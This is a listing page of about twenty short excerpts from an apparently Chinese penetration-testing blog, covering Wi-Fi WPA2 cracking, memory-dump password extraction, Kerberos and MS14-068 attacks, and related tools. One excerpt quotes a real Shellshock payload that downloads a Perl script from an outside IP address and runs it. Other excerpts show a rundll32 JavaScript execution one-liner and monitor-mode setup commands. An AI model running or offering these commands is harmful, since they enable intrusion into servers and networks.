- 博客(20)
- 收藏
- 关注
原创 [译]使用Volatility从memory dump获得密码
原文地址:[url]https://cyberarms.wordpress.com/2011/11/04/memory-forensics-how-to-pull-passwords-from-a-memory-dump/[/url][b]1. 从memory dump 获得一些信息[/b][code="java"]volatility imageinfo -f memorydumpf...
2014-12-30 12:27:21 3319 3
原创 man crunch
[url]http://adaywithtape.blogspot.com.au/2011/05/creating-wordlists-with-crunch-v30.html[/url]
2014-12-28 23:35:44 88
原创 Aircrack-Ng
[url]http://null-byte.wonderhowto.com/how-to/hack-wi-fi-cracking-wpa2-psk-passwords-using-aircrack-ng-0148366/[/url]Step0: Preparationifconfig wlan0 downiwconfig wlan0 mode monitorifconfig wla...
2014-12-28 18:14:26 131
原创 password
wordlist: [url]http://hashcrack.blogspot.com/p/wordlist-downloads_29.html[/url]hash crack online: [url]http://hashcrack.blogspot.com/p/hash-crackers.html[/url]
2014-12-28 17:32:48 132
原创 kaili 1.09安装问题解决
本人采用的安装方法是1. 在VMware中安装1.09 Kali2. 将硬盘插入移动硬盘盒,usb插入,连接虚拟机3. dd if=/dev/sda of=/dev/sdb bs=16k4. sync5. eject然后硬盘就做好了,将硬盘装入电脑中,启动电脑这是出现硬盘坏点错误,不能启动图形界面提示输入root密码进行硬盘检查这时输入root密码然后fsc...
2014-12-28 14:10:28 125
原创 [译]Rogue Wi-Fi--------Mana
参考文章:[url]https://cyberarms.wordpress.com/2014/10/16/mana-tutorial-the-intelligent-rogue-wi-fi-router/[/url]一旦成功连接,自动运行SSLstrip来把HTTPS降级为HTTP,从而可以绕过HSTS来进行Mitm,破解Wi-Fi密码,抓取cookie,以及使用Firelamb来模拟se...
2014-12-26 23:39:17 168
原创 MITM MITMf
MITMf: [url]https://github.com/byt3bl33d3r/MITMf[/url]安装方法:使用方法:[url]http://sign0f4.blogspot.com/[/url]
2014-12-25 01:55:12 161
原创 Windows工具集
参考:[url]https://community.rapid7.com/servlet/JiveServlet/downloadBody/2881-102-2-6389/Mitigating%20Service%20Account%20Credential%20Theft%20on%20Windows.pdf[/url][b]Kerberos[/b]KerbCrack([url]ht...
2014-12-25 00:54:12 165
原创 Shellshock示例
来自:[url]http://pastebin.com/Qbgn09Wa[/url]邮件:[quote]===To:() { :; };wget -O /tmp/.legend http://190.94.251.41/legend.txt;killall -9 perl;perl /tmp/.legend References:() { :; };wget -O /tmp...
2014-12-19 01:21:08 68
原创 Kerberos攻击
参考:1. [url]http://securityweekly.com/2014/09/26/derbycon-attacking-kerberos-talk-ill-be-checking-out-and-you-should-too/[/url]2. [url]https://files.sans.org/summit/hackfest2014/PDFs/Kicking%20the%...
2014-12-18 01:39:08 373
原创 [译]剪切粘贴二进制文件
原文地址:[url]http://pen-testing.sans.org/blog/pen-testing/2014/12/10/awkward-binary-file-transfers-with-cut-and-paste[/url][b]Step 1 压缩源文件[/b][quote][color=blue]root@kali:~# gzip /bin/nc.traditio...
2014-12-17 01:20:45 361
原创 命令行执行JavaScript
[code="java"]rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";alert(‘foo’);[/code][img]http://dl2.iteye.com/upload/attachment/0104/3726/1b28aaec-ff50-3084-a61b-1b20ef72328e.png[/img]...
2014-12-15 00:10:16 322
原创 [译]使用Kerberos Exploitation Kit攻击MS14-068漏洞
原文地址:http://adsecurity.org/?p=676Kerberos漏洞允许攻击者提权域用户成为管理员账户。攻击者可以使用这些权限来访问域中任何机器,包含DC。攻击者必须有一个域口令来进行这种攻击本文使用MS14-068成功攻击Server 2012 和 2012/R2但是未能成功攻击2008 R2 DC[color=blue][b]开始攻击[/b][/col...
2014-12-14 23:49:56 383
原创 kali更新exploit-db
[code="java"]cd /usr/share/exploitdbwget http://www.exploit-db.com/archive.tar.bz2tar -xvjf archive.tar.bz2rm archive.tar.bz2[/code]
2014-12-12 01:08:06 1234
原创 使用Tesseract 识别验证码
参考:[url]http://code.google.com/p/tesseract-ocr/[/url][url]https://stackoverflow.com/questions/2363490/limit-characters-tesseract-is-looking-for[/url][url]http://resources.infosecinstitute.com/ca...
2014-12-10 00:48:23 83
原创 工具--excesspy 客户端邮件xss检查工具
项目地址:[url]https://github.com/allodoxaphobia/excesspy[/url]基本原理:从[url]http://ha.ckers.org/xssAttacks.xml[/url]下载各种xss payload,然后填充在mail的body,subject,from,to,header中,发送HTML格式邮件,然后客户端检查邮件。需要有一个账号,发...
2014-12-09 01:14:24 141
原创 文档-保护php文件上传
原文地址:[url]http://www.gremwell.com/sites/default/files/php-file-upload.pdf[/url]
2014-12-09 00:36:55 59
原创 服务器端包含注入
原文地址:[url]https://www.owasp.org/index.php/Server-Side_Includes_(SSI)_Injection[/url][url]http://resources.infosecinstitute.com/server-side-includes-ssi-injection/[/url]服务器端包含注入SSI出现在动态填写HTML页面的场...
2014-12-05 01:21:10 229
原创 使用apt-fast加速Ubuntu软件安装
apt-get是Ubuntu常用的软件安装和更新命令但是它使用单个连接来下载文件。所以产生了apt-get的替换命令apt-fast。安装:[code="java"]1. sudo apt-get install axel2. 从http://www.mattparnell.com/linux/apt-fast/下载脚本3. sudo mv ~/Downloads/apt-fast...
2014-12-02 01:21:54 102
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人